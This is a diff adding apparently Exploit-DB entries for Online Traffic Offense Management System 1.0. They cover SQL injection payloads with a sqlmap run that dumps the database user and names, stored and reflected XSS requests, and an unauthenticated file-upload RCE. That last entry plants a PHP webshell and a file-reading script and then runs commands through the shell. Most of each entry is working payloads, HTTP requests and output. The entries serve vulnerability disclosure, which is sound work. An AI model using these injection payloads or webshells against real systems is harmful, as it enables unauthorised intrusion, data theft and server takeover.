+
+1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #3* ((custom) POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1' AND 5855=5855 AND 'broT'='broT
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+[...]
+
+# Dump user, used database, all databases on the server using sqlmap
+
+C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch
+[...]
+[06:06:23] [INFO] testing MySQL
+[06:06:23] [INFO] confirming MySQL
+[06:06:24] [WARNING] reflective value(s) found and filtering out
+[06:06:24] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.48, PHP 7.4.23
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+[06:06:24] [INFO] fetching current user
+[06:06:24] [INFO] resumed: 'root@localhost'
+current user: 'root@localhost'
+[06:06:24] [INFO] fetching current database
+[06:06:24] [INFO] retrieved: 'traffic_offense_db'
+current database: 'traffic_offense_db'
+[06:06:24] [INFO] fetching database names
+[06:06:24] [INFO] retrieved: 'information_schema'
+[06:06:24] [INFO] retrieved: 'mysql'
+[06:06:24] [INFO] retrieved: 'performance_schema'
+[06:06:24] [INFO] retrieved: 'phpmyadmin'
+[06:06:24] [INFO] retrieved: 'test'
+[06:06:24] [INFO] retrieved: 'test2'
+[06:06:24] [INFO] retrieved: 'traffic_offense_db'
+available databases [7]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+[*] test2
+[*] traffic_offense_db
+
+[06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost'
+
+[*] ending @ 06:06:24 /2021-10-07/
\ No newline at end of file
diff --git a/exploits/php/webapps/50388.txt b/exploits/php/webapps/50388.txt
new file mode 100644
index 000000000..b1853fcc8
--- /dev/null
+++ b/exploits/php/webapps/50388.txt
@@ -0,0 +1,251 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### XSS Stored and XSS Reflected
+
+# All requests can be sent by both an authenticated and a non-authenticated user
+
+# XSS Stored - example vulnerable pages and parameters:
+
+* The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters
+* We can upload SVG file from XSS to all places in webapp
+* We can add evil code from admin account, regular user account and unauthenticated - we needs only request
+
+* http://localhost/traffic_offense/admin/?page=user
+  Parameters:
+  - firstname
+  - lastname
+  - user image - svg file with javascript code - XSS
+
+* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
+  Parameters:
+  - date_created
+  - ticket_no
+  - officer_id
+  - officer_name
+  - status
+  - remarks
+  - SVG file with javascript code - XSS
+
+* All application is vulnerable
+
+# XSS Reflected - example vulnerable pages and parameters:
+
+* http://localhost/traffic_offense/admin/?page
+  Parameters:
+  - page
+
+* http://localhost/traffic_offense/classes/Login.php
+  Parameters:
+  - username
+  - password
+
+* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
+  Parameters:
+  - id
+
+* http://localhost/traffic_offense/classes/Master.php
+  Parameters:
+  - id
+
+* http://localhost/traffic_offense/classes/Users.php
+  Parameters:
+  - id
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 1 - XSS Reflected
+
+# Request using POST method, payload is in the parameter value id
+
+POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
+Content-Length: 1061
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=user
+Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------21986352462593413643786432583
+Content-Disposition: form-data; name="id"
+
+13<script>alert(1)</script>37
+-----------------------------21986352462593413643786432583
+Content-Disposition: form-data; name="firstname"
+
+hacked
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 01:05:26 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 186
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+UPDATE users set  firstname = 'sdasfd'  ,  lastname = 'fdxfd'  ,  username = 'test2'  ,  `password` = 'ad0234829205b9033196ba818f7a872b'  where id = 13<script>alert(1)</script>37
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request using GET method, payload is in the parameter value id
+
+GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 05:28:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 7893
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1
+SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 2
+
+# XSS Stored
+
+# Save JS payload in user profile and add SVG file from vuln script
+
+POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
+Content-Length: 4304
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=user
+Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="firstname"
+
+admin"/><img src=x onmouseover=alert(1)>
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="lastname"
+
+admin"/><img src=x onmouseover=alert(1)>
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="password"
+
+admnin123
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="img"; filename="xss.svg"
+Content-Type: image/svg+xml
+
+[...]SVG PAYLOAD[...]
+
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 05:31:29 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request download new user data
+
+GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 05:42:04 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 24719
+[...]
+			<div class="form-group col-6">
+					<label for="name">First Name</label>
+					<input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
+				</div>
+				<div class="form-group col-6">
+					<label for="name">Last Name</label>
+					<input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
+				</div>
+[...]
+			<div class="form-group col-6 d-flex justify-content-center">
+					<img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
+				</div>
+[...]
\ No newline at end of file
diff --git a/exploits/php/webapps/50389.txt b/exploits/php/webapps/50389.txt
new file mode 100644
index 000000000..c8f44ba10
--- /dev/null
+++ b/exploits/php/webapps/50389.txt
@@ -0,0 +1,457 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### RCE - Remote Code Execution
+
+# All requests can be sent by both an authenticated and a non-authenticated user
+
+# RCE - we can exploit the RCE vulnerability in several ways:
+
+* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
+
+* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
+
+* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user
+
+* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
+
+* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 1
+
+# Request send as Unauthenticated user
+
+POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
+Content-Length: 1184
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="firstname"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="lastname"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="username"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="password"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="type"
+
+1
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="img"; filename="cmd.php"
+Content-Type: application/octet-stream
+
+<HTML><BODY>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="x">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<?php
+if($_REQUEST['x']) {
+  system($_REQUEST['x']);
+  } else phpinfo();
+?>
+</pre>
+</BODY></HTML>
+
+
+
+-----------------------------210106920639395210803657370685--
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 07:59:24 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+-----------------------------------------------------------------------------------------------------------------------
+# The file was uploaded to the uploads directory
+# Request to list files in uploads\
+
+GET /traffic_offense/uploads/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:06:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+Access-Control-Allow-Origin: *
+Content-Length: 2139
+Content-Type: text/html;charset=UTF-8
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
+<html>
+ <head>
+  <title>Index of /traffic_offense/uploads</title>
+ </head>
+ <body>
+<h1>Index of /traffic_offense/uploads</h1>
+  <table>
+   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
+   <tr><th colspan="5"><hr></th></tr>
+<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
+<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a>  </td><td align="right">2021-08-19 09:24  </td><td align="right"> 11K</td><td>&nbsp;</td></tr>
+<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58  </td><td align="right">5.2K</td><td>&nbsp;</td></tr>
+<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a>     </td><td align="right">2021-10-07 07:31  </td><td align="right">3.4K</td><td>&nbsp;</td></tr>
+<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a>     </td>
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request to webshell
+
+GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:10:10 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Access-Control-Allow-Origin: *
+Content-Length: 810
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<HTML><BODY>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+ Volume in drive C has no label.
+ Volume Serial Number is 283C-C6A0
+
+ Directory of C:\xampp\htdocs\traffic_offense\uploads
+
+07.10.2021  10:09    <DIR>          .
+07.10.2021  10:09    <DIR>          ..
+19.08.2021  09:24            11ÿ426 1629336240_avatar.jpg
+20.08.2021  08:58             5ÿ288 1629421080_tl-logo.png
+07.10.2021  07:31             3ÿ451 1633584660_xss.svg
+07.10.2021  09:59               252 1633593540_cmd.php
+07.10.2021  10:02               252 1633593720_cmd.php
+07.10.2021  09:02    <DIR>          drivers
+               5 File(s)         20ÿ669 bytes
+               3 Dir(s)  86ÿ494ÿ085ÿ120 bytes free
+</pre>
+</BODY></HTML>
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 2
+
+# Webshell as System Logo and next webshell as Potal Cover in System Information page
+
+# Request
+
+POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
+Content-Length: 3176
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=system_info
+Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="name"
+
+Online Traffic Offense Management System - PHP
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="short_name"
+
+OTOMS - PHP
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="about_us"
+
+<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="img"; filename="cmd.php"
+Content-Type: application/octet-stream
+
+<HTML><BODY>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<?php
+if($_REQUEST['x']) {
+  system($_REQUEST['x']);
+  } else phpinfo();
+?>
+</pre>
+</BODY></HTML>
+
+
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="cover"; filename="list.php"
+Content-Type: application/octet-stream
+
+<?php
+
+if($_GET['file']) {
+	$fichero=$_GET['file'];
+	} else {
+	$fichero="/";
+	}
+
+if($handle = @opendir($fichero)) {
+  while($filename = readdir($handle)) {
+    echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
+    }
+  closedir($handle);
+  } else {
+  echo "FILE: " . $fichero . "<br><hr><pre>";
+  $fp = fopen($fichero, "r");
+  $buffer = fread($fp, filesize($fichero));
+  echo $buffer;
+  fclose($fp);
+  }
+
+?>
